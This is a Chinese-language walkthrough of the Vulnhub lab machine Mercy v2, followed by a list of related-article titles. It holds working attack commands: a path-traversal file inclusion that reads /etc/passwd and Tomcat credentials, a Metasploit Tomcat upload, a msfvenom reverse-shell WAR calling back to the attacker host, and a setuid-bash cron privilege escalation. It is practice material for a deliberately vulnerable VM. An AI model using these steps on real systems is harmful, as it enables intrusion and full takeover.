kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

使用enum4linux对目标smb服务进行枚举

enum4linux -a 192.168.111.130

目标文件共享的目录

目标存在的用户

8080端口的网站robots.txt提示存在一个文件

访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password

echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==' | base64 -d

使用用户qiu和密码:password,查看目标文件共享

smbclient -U qiu \\\\192.168.111.130\\qiu

在\.private\opensesame目录下存放有两个文件

查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中

使用knock进行端口碰撞开启22和80端口

knock 192.168.111.130 159 27391 4 -v
knock 192.168.111.130 17301 28504 9999 -v

漏洞利用

访问目标80的robots.txt,提示两个目录

其中/nomercy目录下的rips cms存在文件包含漏洞

searchsploit rips

http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/passwd

在8080端口首页存在提示:

注意:出于安全原因,使用管理器 Web 应用程序仅限于角色为“manager-gui”的用户。主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在 /etc/tomcat7/tomcat-users.xml 中定义。

文件包含/etc/tomcat7/tomcat-users.xml,在页面底部有用户fluffy和thisisasuperduperlonguser的密码

http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml

使用thisisasuperduperlonguser用户登录8080端口的tomcat后台

拿shell的两种方法

第一种

使用msf模块exploit/multi/http/tomcat_mgr_upload上传反弹shell

use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.111.130
set rport 8080
set Httpusername thisisasuperduperlonguser
set httppassword heartbreakisinevitable
run

第二种

使用msfvenom生成war包,上传war包后执行反弹shell

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.111.111 lport=5555 -f war > shell1.war

使用7z查看war包内容

7z l shell1.war

上传后会自动生成目录(目录名为war包文件名),反弹shell为使用7z查看的.jsp后缀文件

访问http://192.168.111.130:8080/shell1/sjwdzibqunxeli.jsp获得反弹shell

提权

使用之前在/etc/tomcat7/tomcat-users.xml发现的fluffy用户密码切换到fluffy用户

在fluffy用户家目录下的.private/secrets目录中发现timeclock文件

猜测是计划任务(文件名提示这么明显了),同时该文件有777权限,修改文件内容提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> timeclock
/tmp/bash -p

Vulnhub:Digitalworld.local (Mercy v2)靶机相关推荐

  1. vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)

    https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...

  2. OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2

    nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...

  3. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  4. Vulnhub:Digitalworld.local (Development)靶机

    kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...

  5. vulnhub mercy v2

    nmap扫描主机和开放的端口 靶机IP:10.0.2.52 进入8080端口 发现 host-manager需要输入用户名和密码 gobuster扫描 进入robots 进入上述目录  放在解密网站里 ...

  6. 【VulnHub靶场】——CFS三层靶机内网渗透实操

    作者名:白昼安全 主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:希望是你,最好是你,一定是你 嗨害嗨,我又回来啦,8月份 ...

  7. 靶机渗透练习56-digitalworld.local:TORMENT

    靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil ...

  8. 靶机渗透练习53-digitalworld.local:BRAVERY

    靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...

  9. 靶机渗透练习58-digitalworld.local:VENGEANCE

    靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us ...

最新文章

  1. 课程第五天内容《基础交换 五》
  2. jupyter配置默认启动目录
  3. php 图像 处理,PHP 处理图像步骤解析
  4. linux shell less 命令---转
  5. JSPatch Convertor 实现原理详解
  6. 【深度学习系列】基础知识、模型学习
  7. 【转载】浅谈 看图软件 的设计与实现
  8. python机器学习彩票_Python机器学习及实战kaggle从零到竞赛PDF电子版分享
  9. 2022.7台式机装机指南(3060 + 12490F)
  10. Office在线预览-永中
  11. c语言四则混合运算可以带括号,带小括号的四则混合运算听后感
  12. Salesforce随笔: 解决被指定给Chatter相关用户的RecordType无法被删除的问题
  13. 【BZOJ】3168: [Heoi2013]钙铁锌硒维生素
  14. Logo Grabber 一键快速下载网站Logo 的免费插件
  15. 【PHP】php 递归、效率和分析
  16. 毛玻璃matlab,QA清单(毛玻璃赛题)
  17. 安全多方计算之BGW算法
  18. 神经网络ppt不足之处怎么写,神经网络ppt免费下载
  19. 手撕自动驾驶算法——IMU测量模型、运动模型、误差模型
  20. 利用vbs将word、excel、ppt转换成pdf

热门文章

  1. 数据挖掘实战(聚类分析)
  2. 一行Python代码,畅玩童年经典游戏~
  3. 西门子苏州研究院 java_2021届西门子SGP校招Video Interview经历
  4. 新兴前端框架 Svelte 从入门到原理
  5. 借壳上市案例解析-容易理解
  6. 学校计算机机房解说词,学校各功能馆室解说词
  7. 层次分析法(评价问题)的基本解题步骤和思路
  8. Bootstrap(自助法) 学习笔记
  9. 高德地图上线全国最全小客车、货车限行提醒功能
  10. linux下erp软件开发,10个Linux平台开源ERP软件推荐